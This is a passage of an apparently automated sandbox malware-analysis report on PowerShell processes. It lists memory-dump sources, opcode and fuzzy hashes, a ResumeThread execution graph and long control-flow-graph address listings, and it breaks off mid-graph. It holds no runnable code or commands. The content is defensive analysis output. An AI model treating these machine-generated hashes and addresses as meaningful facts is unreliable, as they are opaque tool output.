                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000004.00000002.58407581901.00007FFB4C930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4C930000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ffb4c930000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 9a9f0259e4ff6da0e5d818bd49529e0b4fbc92485f11cb4f7325a3332a235393
                                                                                                                                                          • Instruction ID: 07fcfa75feada4f622beb12f86ec2430ed05dfcf733366fc6fc0784155a5b076
                                                                                                                                                          • Opcode Fuzzy Hash: 9a9f0259e4ff6da0e5d818bd49529e0b4fbc92485f11cb4f7325a3332a235393
                                                                                                                                                          • Instruction Fuzzy Hash: 6011E9E6F1C91A1AE6F6B97CD1AA2BC52C2EFDCA20B440177C41EC31E1DF1A9C450280
                                                                                                                                                          Function 00007FFB4C8637B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000004.00000002.58403616749.00007FFB4C860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4C860000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ffb4c860000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: abec2792b95cc3134e75351a9277a07185e0420c5c5f3ff60835923a31afeda3
                                                                                                                                                          • Instruction ID: e2fed715e5bab7a64c61b05df7caa941fb071880446abda042a0fe9897fe6a9a
                                                                                                                                                          • Opcode Fuzzy Hash: abec2792b95cc3134e75351a9277a07185e0420c5c5f3ff60835923a31afeda3
                                                                                                                                                          • Instruction Fuzzy Hash: 9401677151CB0D4FD748EF0CE451AB6B7E0FB95324F10056EE58AC3661D636E892CB45
                                                                                                                                                          Function 00007FFB4C8650E1 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000004.00000002.58403616749.00007FFB4C860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4C860000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ffb4c860000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: d46f4f4e515f5dd19c659b2c8a09c6290ddf029f5e8c173ad80eea47dbb7c973
                                                                                                                                                          • Instruction ID: d9fdb002c4d735f41e3ab70f34975de00bd97ab4b7f726a23d43608a3edbed91
                                                                                                                                                          • Opcode Fuzzy Hash: d46f4f4e515f5dd19c659b2c8a09c6290ddf029f5e8c173ad80eea47dbb7c973
                                                                                                                                                          • Instruction Fuzzy Hash: 45F017B4E1820B8BDB00EFA8C5855BEB7B0EB54310F208526C116EA281DB38AA408B80
                                                                                                                                                          Function 00007FFB4C869658 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000004.00000002.58403616749.00007FFB4C860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4C860000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ffb4c860000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: dedd367a5bf103af1e066d02362a3f1735dadf134259d774234d64f05ca43a02
                                                                                                                                                          • Instruction ID: 31a81a74b40e2c72e8ad837a6701365e510e18bc86a63d42247488a0485c2dfd
                                                                                                                                                          • Opcode Fuzzy Hash: dedd367a5bf103af1e066d02362a3f1735dadf134259d774234d64f05ca43a02
                                                                                                                                                          • Instruction Fuzzy Hash: E8E0C2B1B4C90907E758BA3CE4061B973C1EF88611B45863BD84EC2282CD3CE9814380
                                                                                                                                                          Function 00007FFB4C865FB5 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000004.00000002.58403616749.00007FFB4C860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4C860000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ffb4c860000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 73d8b71b096e80fe4079579565e1ed87bd4e065a3256455c004e950bc18a809b
                                                                                                                                                          • Instruction ID: 4c7f606951ddfb31750483fd37156de357148863933cafb7940f11bcc044e57f
                                                                                                                                                          • Opcode Fuzzy Hash: 73d8b71b096e80fe4079579565e1ed87bd4e065a3256455c004e950bc18a809b
                                                                                                                                                          • Instruction Fuzzy Hash: C0E092A175D7455FD609FE7CC4AA479B3D1EF8261074051BFD59A831D3DD6814098601
                                                                                                                                                          Function 00007FFB4C8691BF Relevance: .0, Instructions: 11COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000004.00000002.58403616749.00007FFB4C860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4C860000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ffb4c860000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: e1d48d1ff8d7082587831e7a406b34eb3c1619b8831c351a242c584725f089d2
                                                                                                                                                          • Instruction ID: 382d5bdde6da9ff9b0cd736d8ce980b62a8e420d5df2d20af6bbb4dc3b7b571d
                                                                                                                                                          • Opcode Fuzzy Hash: e1d48d1ff8d7082587831e7a406b34eb3c1619b8831c351a242c584725f089d2
                                                                                                                                                          • Instruction Fuzzy Hash: 78C012B161C15287952D693881151356276FB45501725507ED587571D6893A6801C745

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:1.2%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                          Total number of Nodes:5
                                                                                                                                                          Total number of Limit Nodes:0
                                                                                                                                                          execution_graph 5316 7ffb4c88bc19 5317 7ffb4c88bc25 5316->5317 5320 7ffb4c88e158 5317->5320 5321 7ffb4c8904f0 ResumeThread 5320->5321 5323 7ffb4c88fcea 5321->5323

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 00007FFB4C88E158 Relevance: 1.6, APIs: 1, Instructions: 122threadCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 0 7ffb4c88e158-7ffb4c8905b4 ResumeThread 7 7ffb4c8905b6 0->7 8 7ffb4c8905bc-7ffb4c8905e1 0->8 7->8
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.58460901423.00007FFB4C880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4C880000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ffb4c880000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ResumeThread
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 947044025-0
                                                                                                                                                          • Opcode ID: 768f048992be278e51cc30d90d67c1ea40dd25c65edc4f377d2ce7d33d809bfe
                                                                                                                                                          • Instruction ID: 4670b71983a035e3595243862035a8ecf1a28fbeb63184d68e2a36ad559d4615
                                                                                                                                                          • Opcode Fuzzy Hash: 768f048992be278e51cc30d90d67c1ea40dd25c65edc4f377d2ce7d33d809bfe
                                                                                                                                                          • Instruction Fuzzy Hash: 6031C5B190DB484FDB59DFB8944A6F97BE0EF56321F0441AFD04AC7262CA6498068B51
                                                                                                                                                          Function 00007FFB4C950BBD Relevance: .8, Instructions: 840COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 10 7ffb4c950bbd-7ffb4c950c44 12 7ffb4c950df9-7ffb4c950ea9 10->12 13 7ffb4c950c4a-7ffb4c950c54 10->13 51 7ffb4c950eab 12->51 52 7ffb4c950eac-7ffb4c950ebd 12->52 14 7ffb4c950c6d-7ffb4c950c72 13->14 15 7ffb4c950c56-7ffb4c950c63 13->15 16 7ffb4c950c78-7ffb4c950c7b 14->16 17 7ffb4c950d9a-7ffb4c950da4 14->17 15->14 24 7ffb4c950c65-7ffb4c950c6b 15->24 20 7ffb4c950c92-7ffb4c950c96 16->20 21 7ffb4c950c7d-7ffb4c950c86 16->21 22 7ffb4c950db3-7ffb4c950df6 17->22 23 7ffb4c950da6-7ffb4c950db2 17->23 20->17 31 7ffb4c950c9c-7ffb4c950cd3 20->31 21->20 22->12 24->14 43 7ffb4c950cf7 31->43 44 7ffb4c950cd5-7ffb4c950cf5 31->44 45 7ffb4c950cf9-7ffb4c950cfb 43->45 44->45 45->17 46 7ffb4c950d01-7ffb4c950d04 45->46 46->17 50 7ffb4c950d0a-7ffb4c950d44 46->50 70 7ffb4c950d60-7ffb4c950d63 50->70 71 7ffb4c950d46-7ffb4c950d5e 50->71 51->52 54 7ffb4c950ebf 52->54 55 7ffb4c950ec0-7ffb4c950f3b 52->55 54->55 59 7ffb4c950f3d-7ffb4c950f4a 55->59 60 7ffb4c950f54-7ffb4c950f60 55->60 59->60 64 7ffb4c950f4c-7ffb4c950f52 59->64 65 7ffb4c950f62-7ffb4c950f87 60->65 66 7ffb4c950fcd-7ffb4c95104a 60->66 64->60 85 7ffb4c950f9d-7ffb4c950fa3 65->85 86 7ffb4c950f89-7ffb4c950f99 65->86 72 7ffb4c951130-7ffb4c9511df 66->72 73 7ffb4c951050-7ffb4c95105a 66->73 76 7ffb4c950d6a-7ffb4c950d73 70->76 71->70 116 7ffb4c9511e1 72->116 117 7ffb4c9511e6-7ffb4c9511f7 72->117 77 7ffb4c95105c-7ffb4c951071 73->77 78 7ffb4c951073-7ffb4c951078 73->78 80 7ffb4c950d8c-7ffb4c950d99 76->80 81 7ffb4c950d75-7ffb4c950d82 76->81 77->78 83 7ffb4c9510c9-7ffb4c9510d3 78->83 84 7ffb4c95107a-7ffb4c95107d 78->84 81->80 96 7ffb4c950d84-7ffb4c950d8a 81->96 90 7ffb4c9510e4-7ffb4c95112d 83->90 91 7ffb4c9510d5-7ffb4c9510e3 83->91 84->83 92 7ffb4c95107f-7ffb4c951082 84->92 86->85 90->72 92->83 99 7ffb4c951084-7ffb4c951087 92->99 96->80 99->83 101 7ffb4c951089-7ffb4c9510a0 99->101 108 7ffb4c9510a2-7ffb4c9510af 101->108 109 7ffb4c9510b9-7ffb4c9510c8 101->109 108->109 112 7ffb4c9510b1-7ffb4c9510b7 108->112 112->109 116->117 118 7ffb4c9511e3 116->118 119 7ffb4c9511fe-7ffb4c951276 117->119 120 7ffb4c9511f9 117->120 118->117 123 7ffb4c951278-7ffb4c951281 119->123 120->119 122 7ffb4c9511fb 120->122 122->119 125 7ffb4c951284-7ffb4c9512d9 123->125
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.58462761818.00007FFB4C950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4C950000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ffb4c950000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: fdbed97c90f626a96fbedae38d3dba22fe8030cfd6ee11baa7f87d79084b015a
                                                                                                                                                          • Instruction ID: 841fcf5c339541c3849d059c79b7e80447683346fccccd0b25c44d9338d1b6eb
                                                                                                                                                          • Opcode Fuzzy Hash: fdbed97c90f626a96fbedae38d3dba22fe8030cfd6ee11baa7f87d79084b015a
                                                                                                                                                          • Instruction Fuzzy Hash: 9332F7A290EBC92FE757AB78C95D1A57FE0DF56620B0901FBD48CCB193D9189C09C392
                                                                                                                                                          Function 00007FFB4C951C92 Relevance: .6, Instructions: 575COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 130 7ffb4c951c92-7ffb4c951c9c 131 7ffb4c951c9e-7ffb4c951cbd 130->131 132 7ffb4c951ce6-7ffb4c951d80 130->132 131->132 142 7ffb4c951d82-7ffb4c951d98 132->142 143 7ffb4c951d9e-7ffb4c951de7 132->143 142->143 147 7ffb4c951f3f-7ffb4c951f6b 143->147 148 7ffb4c951ded-7ffb4c951df7 143->148 158 7ffb4c951f6d-7ffb4c951fb9 147->158 159 7ffb4c951fba-7ffb4c951ff1 147->159 149 7ffb4c951df9-7ffb4c951e11 148->149 150 7ffb4c951e13-7ffb4c951e20 148->150 149->150 156 7ffb4c951ee0-7ffb4c951eea 150->156 157 7ffb4c951e26-7ffb4c951e29 150->157 162 7ffb4c951eec-7ffb4c951ef8 156->162 163 7ffb4c951ef9-7ffb4c951f3c 156->163 157->156 160 7ffb4c951e2f-7ffb4c951e37 157->160 158->159 183 7ffb4c951ff3 159->183 184 7ffb4c951ff4-7ffb4c952005 159->184 160->147 165 7ffb4c951e3d-7ffb4c951e47 160->165 163->147 168 7ffb4c951e60-7ffb4c951e64 165->168 169 7ffb4c951e49-7ffb4c951e59 165->169 168->156 174 7ffb4c951e66-7ffb4c951e69 168->174 176 7ffb4c951e90 174->176 177 7ffb4c951e6b-7ffb4c951e8e 174->177 179 7ffb4c951e92-7ffb4c951e94 176->179 177->179 179->156 182 7ffb4c951e96-7ffb4c951ea0 179->182 186 7ffb4c951ea2-7ffb4c951ea9 182->186 183->184 187 7ffb4c952007 184->187 188 7ffb4c952008-7ffb4c952099 call 7ffb4c95206c 184->188 190 7ffb4c951eb0-7ffb4c951eb9 186->190 187->188 198 7ffb4c95209f-7ffb4c9520a9 188->198 199 7ffb4c9521eb-7ffb4c952219 188->199 192 7ffb4c951ed2-7ffb4c951edf 190->192 193 7ffb4c951ebb-7ffb4c951ec8 190->193 193->192 197 7ffb4c951eca-7ffb4c951ed0 193->197 197->192 200 7ffb4c9520c2-7ffb4c9520c7 198->200 201 7ffb4c9520ab-7ffb4c9520c0 198->201 213 7ffb4c95221b-7ffb4c952267 199->213 214 7ffb4c952268-7ffb4c95229b 199->214 203 7ffb4c9520cd-7ffb4c9520d0 200->203 204 7ffb4c952188-7ffb4c952192 200->204 201->200 208 7ffb4c9520d2-7ffb4c9520e5 203->208 209 7ffb4c952119 203->209 210 7ffb4c9521a3-7ffb4c9521e8 204->210 211 7ffb4c952194-7ffb4c9521a2 204->211 208->199 222 7ffb4c9520eb-7ffb4c9520f5 208->222 215 7ffb4c95211b-7ffb4c95211d 209->215 210->199 213->214 241 7ffb4c9522a2-7ffb4c9522b3 214->241 242 7ffb4c95229d 214->242 215->204 219 7ffb4c95211f-7ffb4c952122 215->219 219->204 220 7ffb4c952124-7ffb4c95212a 219->220 225 7ffb4c95212c-7ffb4c952147 220->225 226 7ffb4c952149-7ffb4c95215f 220->226 228 7ffb4c95210e-7ffb4c952117 222->228 229 7ffb4c9520f7-7ffb4c952104 222->229 225->226 239 7ffb4c952161-7ffb4c95216e 226->239 240 7ffb4c952178-7ffb4c952187 226->240 228->215 229->228 236 7ffb4c952106-7ffb4c95210c 229->236 236->228 239->240 248 7ffb4c952170-7ffb4c952176 239->248 246 7ffb4c9522ba-7ffb4c952349 241->246 247 7ffb4c9522b5 241->247 242->241 245 7ffb4c95229f 242->245 245->241 255 7ffb4c95234f-7ffb4c952359 246->255 256 7ffb4c952498-7ffb4c952547 246->256 247->246 249 7ffb4c9522b7 247->249 248->240 249->246 257 7ffb4c952372-7ffb4c952377 255->257 258 7ffb4c95235b-7ffb4c952370 255->258 299 7ffb4c95254e-7ffb4c95255f 256->299 300 7ffb4c952549 256->300 261 7ffb4c95237d-7ffb4c952380 257->261 262 7ffb4c952435-7ffb4c95243f 257->262 258->257 264 7ffb4c952382-7ffb4c952395 261->264 265 7ffb4c9523c9 261->265 266 7ffb4c952450-7ffb4c952495 262->266 267 7ffb4c952441-7ffb4c95244f 262->267 264->256 277 7ffb4c95239b-7ffb4c9523a5 264->277 270 7ffb4c9523cb-7ffb4c9523cd 265->270 266->256 270->262 272 7ffb4c9523cf-7ffb4c9523d2 270->272 272->262 275 7ffb4c9523d4-7ffb4c9523da 272->275 279 7ffb4c9523dc-7ffb4c9523f7 275->279 280 7ffb4c9523f9-7ffb4c95240c 275->280 281 7ffb4c9523be-7ffb4c9523c7 277->281 282 7ffb4c9523a7-7ffb4c9523b4 277->282 279->280 290 7ffb4c95240e-7ffb4c95241b 280->290 291 7ffb4c952425-7ffb4c952434 280->291 281->270 282->281 288 7ffb4c9523b6-7ffb4c9523bc 282->288 288->281 290->291 295 7ffb4c95241d-7ffb4c952423 290->295 295->291 302 7ffb4c952561 299->302 303 7ffb4c952566-7ffb4c9525ff 299->303 300->299 301 7ffb4c95254b 300->301 301->299 302->303 304 7ffb4c952563 302->304 308 7ffb4c9527cf-7ffb4c952810 303->308 309 7ffb4c952605-7ffb4c95260f 303->309 304->303 327 7ffb4c952812-7ffb4c952864 308->327 328 7ffb4c952866-7ffb4c95287d 308->328 310 7ffb4c952611-7ffb4c95261f 309->310 311 7ffb4c952629-7ffb4c95262f 309->311 310->311 321 7ffb4c952621-7ffb4c952627 310->321 312 7ffb4c952764-7ffb4c95276e 311->312 313 7ffb4c952635-7ffb4c952638 311->313 319 7ffb4c952770-7ffb4c952780 312->319 320 7ffb4c952781-7ffb4c9527cc 312->320 316 7ffb4c952681 313->316 317 7ffb4c95263a-7ffb4c95264d 313->317 323 7ffb4c952683-7ffb4c952685 316->323 317->308 330 7ffb4c952653-7ffb4c95265d 317->330 320->308 321->311 323->312 329 7ffb4c95268b-7ffb4c95268e 323->329 327->328 348 7ffb4c95287f-7ffb4c952885 328->348 349 7ffb4c952889-7ffb4c952895 328->349 329->312 332 7ffb4c952694-7ffb4c952697 329->332 335 7ffb4c95265f-7ffb4c952674 330->335 336 7ffb4c952676-7ffb4c95267f 330->336 338 7ffb4c9526be 332->338 339 7ffb4c952699-7ffb4c9526bc 332->339 335->336 336->323 341 7ffb4c9526c0-7ffb4c9526c2 338->341 339->341 341->312 345 7ffb4c9526c8-7ffb4c952708 341->345 345->312 348->349 351 7ffb4c9528a1-7ffb4c95293f 349->351 352 7ffb4c952897-7ffb4c95289d 349->352 352->351
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.58462761818.00007FFB4C950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4C950000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ffb4c950000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 9a4c9c7e8188e54a6b7936160418f91c36a5b491147063610c1f3d6334254506
                                                                                                                                                          • Instruction ID: 99b78f6f5fee96c91c05ad27119a5ceefcb7ee970e75d3a6ae6620b28b6ea87b
                                                                                                                                                          • Opcode Fuzzy Hash: 9a4c9c7e8188e54a6b7936160418f91c36a5b491147063610c1f3d6334254506
                                                                                                                                                          • Instruction Fuzzy Hash: BB0204A2A0EB891FD79BAA38C95D1B53FE1DF56614B0901FBD48CCB193DD189C09C392
                                                                                                                                                          Function 00007FFB4C950C8A Relevance: .1, Instructions: 112COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 361 7ffb4c950c8a-7ffb4c950c96 363 7ffb4c950c9c-7ffb4c950cd3 361->363 364 7ffb4c950d9a-7ffb4c950da4 361->364 374 7ffb4c950cf7 363->374 375 7ffb4c950cd5-7ffb4c950cf5 363->375 365 7ffb4c950db3-7ffb4c950ea9 364->365 366 7ffb4c950da6-7ffb4c950db2 364->366 404 7ffb4c950eab 365->404 405 7ffb4c950eac-7ffb4c950ebd 365->405 377 7ffb4c950cf9-7ffb4c950cfb 374->377 375->377 377->364 378 7ffb4c950d01-7ffb4c950d04 377->378 378->364 381 7ffb4c950d0a-7ffb4c950d44 378->381 392 7ffb4c950d60-7ffb4c950d63 381->392 393 7ffb4c950d46-7ffb4c950d5e 381->393 396 7ffb4c950d6a-7ffb4c950d73 392->396 393->392 397 7ffb4c950d8c-7ffb4c950d99 396->397 398 7ffb4c950d75-7ffb4c950d82 396->398 398->397 402 7ffb4c950d84-7ffb4c950d8a 398->402 402->397 404->405 407 7ffb4c950ebf 405->407 408 7ffb4c950ec0-7ffb4c950f3b 405->408 407->408 411 7ffb4c950f3d-7ffb4c950f4a 408->411 412 7ffb4c950f54-7ffb4c950f60 408->412 411->412 415 7ffb4c950f4c-7ffb4c950f52 411->415 416 7ffb4c950f62-7ffb4c950f87 412->416 417 7ffb4c950fcd-7ffb4c95104a 412->417 415->412 429 7ffb4c950f9d-7ffb4c950fa3 416->429 430 7ffb4c950f89-7ffb4c950f99 416->430 420 7ffb4c951130-7ffb4c9511df 417->420 421 7ffb4c951050-7ffb4c95105a 417->421 456 7ffb4c9511e1 420->456 457 7ffb4c9511e6-7ffb4c9511f7 420->457 423 7ffb4c95105c-7ffb4c951071 421->423 424 7ffb4c951073-7ffb4c951078 421->424 423->424 427 7ffb4c9510c9-7ffb4c9510d3 424->427 428 7ffb4c95107a-7ffb4c95107d 424->428 432 7ffb4c9510e4-7ffb4c95112d 427->432 433 7ffb4c9510d5-7ffb4c9510e3 427->433 428->427 434 7ffb4c95107f-7ffb4c951082 428->434 430->429 432->420 434->427 440 7ffb4c951084-7ffb4c951087 434->440 440->427 442 7ffb4c951089-7ffb4c9510a0 440->442 448 7ffb4c9510a2-7ffb4c9510af 442->448 449 7ffb4c9510b9-7ffb4c9510c8 442->449 448->449 452 7ffb4c9510b1-7ffb4c9510b7 448->452 452->449 456->457 458 7ffb4c9511e3 456->458 459 7ffb4c9511fe-7ffb4c951276 457->459 460 7ffb4c9511f9 457->460 458->457 463 7ffb4c951278-7ffb4c951281 459->463 460->459 462 7ffb4c9511fb 460->462 462->459 465 7ffb4c951284-7ffb4c9512d9 463->465
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.58462761818.00007FFB4C950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4C950000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ffb4c950000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 83b392355d1bbbf07e66e53ecbad9886c9b0e874be9141da139ec600cb2eb666
                                                                                                                                                          • Instruction ID: e25186c59303ef1cd7781b18ef73e15276ad58298cead2bf5a2f35c4ce5ad415
                                                                                                                                                          • Opcode Fuzzy Hash: 83b392355d1bbbf07e66e53ecbad9886c9b0e874be9141da139ec600cb2eb666
                                                                                                                                                          • Instruction Fuzzy Hash: 0F3108D3E1EB4A3BF7AABE78CA6E17869C1EF85650B4410BFD84DC71D2DD18AC040241
                                                                                                                                                          Function 00007FFB4C951E5A Relevance: .1, Instructions: 69COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 470 7ffb4c951e5a-7ffb4c951e64 472 7ffb4c951ee0-7ffb4c951eea 470->472 473 7ffb4c951e66-7ffb4c951e69 470->473 474 7ffb4c951eec-7ffb4c951ef8 472->474 475 7ffb4c951ef9-7ffb4c951f6b 472->475 476 7ffb4c951e90 473->476 477 7ffb4c951e6b-7ffb4c951e8e 473->477 495 7ffb4c951f6d-7ffb4c951fb9 475->495 496 7ffb4c951fba-7ffb4c951ff1 475->496 478 7ffb4c951e92-7ffb4c951e94 476->478 477->478 478->472 481 7ffb4c951e96-7ffb4c951ea9 478->481 486 7ffb4c951eb0-7ffb4c951eb9 481->486 487 7ffb4c951ed2-7ffb4c951edf 486->487 488 7ffb4c951ebb-7ffb4c951ec8 486->488 488->487 491 7ffb4c951eca-7ffb4c951ed0 488->491 491->487 495->496 504 7ffb4c951ff3 496->504 505 7ffb4c951ff4-7ffb4c952005 496->505 504->505 506 7ffb4c952007 505->506 507 7ffb4c952008-7ffb4c952099 call 7ffb4c95206c 505->507 506->507 512 7ffb4c95209f-7ffb4c9520a9 507->512 513 7ffb4c9521eb-7ffb4c952219 507->513 514 7ffb4c9520c2-7ffb4c9520c7 512->514 515 7ffb4c9520ab-7ffb4c9520c0 512->515 526 7ffb4c95221b-7ffb4c952267 513->526 527 7ffb4c952268-7ffb4c95229b 513->527 517 7ffb4c9520cd-7ffb4c9520d0 514->517 518 7ffb4c952188-7ffb4c952192 514->518 515->514 521 7ffb4c9520d2-7ffb4c9520e5 517->521 522 7ffb4c952119 517->522 523 7ffb4c9521a3-7ffb4c9521e8 518->523 524 7ffb4c952194-7ffb4c9521a2 518->524 521->513 535 7ffb4c9520eb-7ffb4c9520f5 521->535 528 7ffb4c95211b-7ffb4c95211d 522->528 523->513 526->527 554 7ffb4c9522a2-7ffb4c9522b3 527->554 555 7ffb4c95229d 527->555 528->518 532 7ffb4c95211f-7ffb4c952122 528->532 532->518 533 7ffb4c952124-7ffb4c95212a 532->533 538 7ffb4c95212c-7ffb4c952147 533->538 539 7ffb4c952149-7ffb4c95215f 533->539 541 7ffb4c95210e-7ffb4c952117 535->541 542 7ffb4c9520f7-7ffb4c952104 535->542 538->539 552 7ffb4c952161-7ffb4c95216e 539->552 553 7ffb4c952178-7ffb4c952187 539->553 541->528 542->541 549 7ffb4c952106-7ffb4c95210c 542->549 549->541 552->553 561 7ffb4c952170-7ffb4c952176 552->561 559 7ffb4c9522ba-7ffb4c952349 554->559 560 7ffb4c9522b5 554->560 555->554 558 7ffb4c95229f 555->558 558->554 568 7ffb4c95234f-7ffb4c952359 559->568 569 7ffb4c952498-7ffb4c952547 559->569 560->559 562 7ffb4c9522b7 560->562 561->553 562->559 570 7ffb4c952372-7ffb4c952377 568->570 571 7ffb4c95235b-7ffb4c952370 568->571 612 7ffb4c95254e-7ffb4c95255f 569->612 613 7ffb4c952549 569->613 574 7ffb4c95237d-7ffb4c952380 570->574 575 7ffb4c952435-7ffb4c95243f 570->575 571->570 577 7ffb4c952382-7ffb4c952395 574->577 578 7ffb4c9523c9 574->578 579 7ffb4c952450-7ffb4c952495 575->579 580 7ffb4c952441-7ffb4c95244f 575->580 577->569 590 7ffb4c95239b-7ffb4c9523a5 577->590 583 7ffb4c9523cb-7ffb4c9523cd 578->583 579->569 583->575 585 7ffb4c9523cf-7ffb4c9523d2 583->585 585->575 588 7ffb4c9523d4-7ffb4c9523da 585->588 592 7ffb4c9523dc-7ffb4c9523f7 588->592 593 7ffb4c9523f9-7ffb4c95240c 588->593 594 7ffb4c9523be-7ffb4c9523c7 590->594 595 7ffb4c9523a7-7ffb4c9523b4 590->595 592->593 603 7ffb4c95240e-7ffb4c95241b 593->603 604 7ffb4c952425-7ffb4c952434 593->604 594->583 595->594 601 7ffb4c9523b6-7ffb4c9523bc 595->601 601->594 603->604 608 7ffb4c95241d-7ffb4c952423 603->608 608->604 615 7ffb4c952561 612->615 616 7ffb4c952566-7ffb4c9525ff 612->616 613->612 614 7ffb4c95254b 613->614 614->612 615->616 617 7ffb4c952563 615->617 621 7ffb4c9527cf-7ffb4c952810 616->621 622 7ffb4c952605-7ffb4c95260f 616->622 617->616 640 7ffb4c952812-7ffb4c952864 621->640 641 7ffb4c952866-7ffb4c95287d 621->641 623 7ffb4c952611-7ffb4c95261f 622->623 624 7ffb4c952629-7ffb4c95262f 622->624 623->624 634 7ffb4c952621-7ffb4c952627 623->634 625 7ffb4c952764-7ffb4c95276e 624->625 626 7ffb4c952635-7ffb4c952638 624->626 632 7ffb4c952770-7ffb4c952780 625->632 633 7ffb4c952781-7ffb4c9527cc 625->633 629 7ffb4c952681 626->629 630 7ffb4c95263a-7ffb4c95264d 626->630 636 7ffb4c952683-7ffb4c952685 629->636 630->621 643 7ffb4c952653-7ffb4c95265d 630->643 633->621 634->624 636->625 642 7ffb4c95268b-7ffb4c95268e 636->642 640->641 661 7ffb4c95287f-7ffb4c952885 641->661 662 7ffb4c952889-7ffb4c952895 641->662 642->625 645 7ffb4c952694-7ffb4c952697 642->645 648 7ffb4c95265f-7ffb4c952674 643->648 649 7ffb4c952676-7ffb4c95267f 643->649 651 7ffb4c9526be 645->651 